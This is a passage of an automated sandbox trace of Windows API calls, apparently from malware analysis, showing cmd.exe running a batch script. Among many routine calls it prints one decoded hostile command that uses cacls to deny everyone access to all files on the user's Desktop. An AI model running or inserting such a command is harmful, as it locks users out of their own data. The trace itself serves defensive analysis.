lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x810, lpOverlapped=0x0) returned 1 [0035.270] SetFilePointer (in: hFile=0x94, lDistanceToMove=669, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0035.270] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=63, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Desktop\\*.*\" /e /d everyone\r\net n=%%i\r\n") returned 63 [0035.271] GetFileType (hFile=0x94) returned 0x1 [0035.271] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.271] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x29d [0035.271] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="5JgHKoaOfdp") returned 0xb [0035.271] _wcsicmp (_String1="echo", _String2=")") returned 60 [0035.271] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0035.271] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0035.272] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0035.272] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0035.272] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0035.272] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0035.272] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0035.272] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0035.272] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0035.272] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0035.272] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0035.272] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0035.272] _tell (_FileHandle=3) returned 669 [0035.272] _close (_FileHandle=3) returned 0 [0035.272] _pipe (in: _PtHandles=0xd25ef8, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0xd25ef8) returned 0 [0035.272] _dup (_FileHandle=1) returned 5 [0035.272] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0035.272] _close (_FileHandle=4) returned 0 [0035.272] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0035.272] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0035.272] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0035.272] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0035.272] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0035.272] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0035.272] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0035.272] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0035.272] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0035.272] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0035.273] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0035.273] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0035.273] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0035.273] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0035.273] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0035.273] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0035.273] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0035.273] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0035.273] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0035.273] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0035.273] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0035.273] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0035.273] SetErrorMode (uMode=0x0) returned 0x0 [0035.273] SetErrorMode (uMode=0x1) returned 0x0 [0035.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x208, lpBuffer=0xd18268, lpFilePart=0xc8ecc4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0xc8ecc4*="system32") returned 0x13 [0035.273] SetErrorMode (uMode=0x0) returned 0x1 [0035.273] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\system32\\.") returned 1 [0035.273] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.273] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.273] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe", fInfoLevelId=0x1, lpFindFileData=0xc8ea70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea70) returned 0xd183a8 [0035.273] FindClose (in: hFindFile=0xd183a8 | out: hFindFile=0xd183a8) returned 1 [0035.274] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0035.274] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0035.274] GetConsoleTitleW (in: lpConsoleTitle=0xc8ef4c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.274] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ee78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ee5c | out: lpAttributeList=0xc8ee78, lpSize=0xc8ee5c) returned 1 [0035.274] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ee78, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ee64, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ee78, lpPreviousValue=0x0) returned 1 [0035.274] GetStartupInfoW (in: lpStartupInfo=0xc8eeb0 | out: lpStartupInfo=0xc8eeb0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0035.274] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0035.274] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0035.274] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0035.274] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0035.274] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.274] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.274] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.274] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0035.274] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0035.274] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0035.274] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0035.274] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0035.274] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0035.274] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0035.274] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0035.274] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0035.274] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0035.274] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0035.274] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0035.274] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.274] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.274] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.274] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.274] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0035.274] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.274] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.274] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.275] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0035.275] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0035.275] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0035.275] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0035.275] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0035.275] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0035.275] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0035.275] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0035.275] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0035.275] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0035.275] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0035.275] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0035.275] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0035.275] lstrcmpW (lpString1="\\cmd.exe", lpString2="\\XCOPY.EXE") returned -1 [0035.275] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8ee00*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ee4c | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"", lpProcessInformation=0xc8ee4c*(hProcess=0x8c, hThread=0x80, dwProcessId=0x3d4, dwThreadId=0xafc)) returned 1 [0035.278] CloseHandle (hObject=0x80) returned 1 [0035.278] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0035.279] GetEnvironmentStringsW () returned 0xd15f98* [0035.279] FreeEnvironmentStringsA (penv="=") returned 1 [0035.279] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ee78 | out: lpAttributeList=0xc8ee78) [0035.279] _get_osfhandle (_FileHandle=3) returned 0x94 [0035.279] DuplicateHandle (in: hSourceProcessHandle=0x8c, hSourceHandle=0x94, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0035.279] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0035.279] _close (_FileHandle=5) returned 0 [0035.279] _dup (_FileHandle=0) returned 4 [0035.279] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0035.279] _close (_FileHandle=3) returned 0 [0035.279] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0035.279] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0035.279] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0035.279] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0035.279] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0035.279] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0035.279] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0035.279] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0035.279] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0035.279] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0035.279] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0035.279] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0035.279] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0035.279] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0035.279] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0035.279] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0035.279] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0035.279] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0035.279] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0035.279] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0035.279] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0035.279] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0035.279] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0035.279] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0035.279] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0035.279] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0035.279] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0035.279] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0035.279] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0035.279] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0035.279] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0035.279] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0035.280] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0035.280] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0035.280] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0035.280] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0035.280] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0035.280] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0035.280] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0035.280] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0035.280] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0035.280] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0035.280] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0035.280] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0035.280] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0035.280] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0035.280] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0035.280] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0035.280] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0035.280] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0035.280] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0035.280] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0035.280] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0035.280] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0035.280] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0035.280] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0035.280] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0035.280] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0035.280] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0035.280] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0035.280] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0035.280] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0035.280] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0035.280] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0035.280] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0035.280] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0035.280] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0035.280] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0035.280] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0035.280] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0035.280] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0035.280] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0035.280] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0035.280] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0035.280] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0035.280] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0035.280] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0035.280] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0035.280] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0035.280] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0035.280] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0035.280] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0035.280] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0035.280] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0035.280] _wcsicmp (_String1="cacls", _String2="FOR") returned -3 [0035.280] _wcsicmp (_String1="cacls", _String2="IF") returned -6 [0035.280] _wcsicmp (_String1="cacls", _String2="REM") returned -15 [0035.281] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0035.281] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0035.281] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0035.281] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0035.281] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0035.281] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0035.281] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0035.281] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0035.281] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0035.281] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0035.281] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0035.281] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0035.281] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0035.281] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0035.281] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0035.281] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0035.281] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0035.281] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0035.281] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0035.281] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0035.281] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0035.281] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0035.281] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0035.281] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0035.281] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0035.281] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0035.281] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0035.281] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0035.281] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0035.281] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0035.281] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0035.281] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0035.281] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0035.281] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0035.281] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0035.281] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0035.281] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0035.281] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0035.281] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0035.281] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0035.281] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0035.281] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0035.281] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0035.281] SetErrorMode (uMode=0x0) returned 0x0 [0035.281] SetErrorMode (uMode=0x1) returned 0x0 [0035.281] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd1baf0, lpFilePart=0xc8ef1c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8ef1c*="Desktop") returned 0x1c [0035.281] SetErrorMode (uMode=0x0) returned 0x1 [0035.282] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0035.282] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0035.282] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.282] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.282] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xffffffff [0035.282] GetLastError () returned 0x2 [0035.282] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.282] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xd18540 [0035.282] FindClose (in: hFindFile=0xd18540 | out: hFindFile=0xd18540) returned 1 [0035.282] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xffffffff [0035.282] GetLastError () returned 0x2 [0035.282] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8eca8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8eca8) returned 0xd18540 [0035.282] FindClose (in: hFindFile=0xd18540 | out: hFindFile=0xd18540) returned 1 [0035.282] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0035.283] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0035.283] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0035.283] SetErrorMode (uMode=0x0) returned 0x0 [0035.283] SetErrorMode (uMode=0x1) returned 0x0 [0035.283] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd15fa0, lpFilePart=0xc8ecc4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8ecc4*="Desktop") returned 0x1c [0035.283] SetErrorMode (uMode=0x0) returned 0x1 [0035.283] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0035.283] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0035.283] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0035.283] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.283] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xffffffff [0035.283] GetLastError () returned 0x2 [0035.283] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0035.283] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xd185c0 [0035.283] FindClose (in: hFindFile=0xd185c0 | out: hFindFile=0xd185c0) returned 1 [0035.283] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xffffffff [0035.284] GetLastError () returned 0x2 [0035.284] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ea50) returned 0xd185c0 [0035.284] FindClose (in: hFindFile=0xd185c0 | out: hFindFile=0xd185c0) returned 1 [0035.284] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0035.284] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0035.284] GetConsoleTitleW (in: lpConsoleTitle=0xc8ef4c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0035.284] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ee78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ee5c | out: lpAttributeList=0xc8ee78, lpSize=0xc8ee5c) returned 1 [0035.284] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ee78, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ee64, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ee78, lpPreviousValue=0x0) returned 1 [0035.284] GetStartupInfoW (in: lpStartupInfo=0xc8eeb0 | out: lpStartupInfo=0xc8eeb0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0035.284] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0035.284] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0035.284] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0035.284] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0035.284] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.284] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.284] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0035.284] 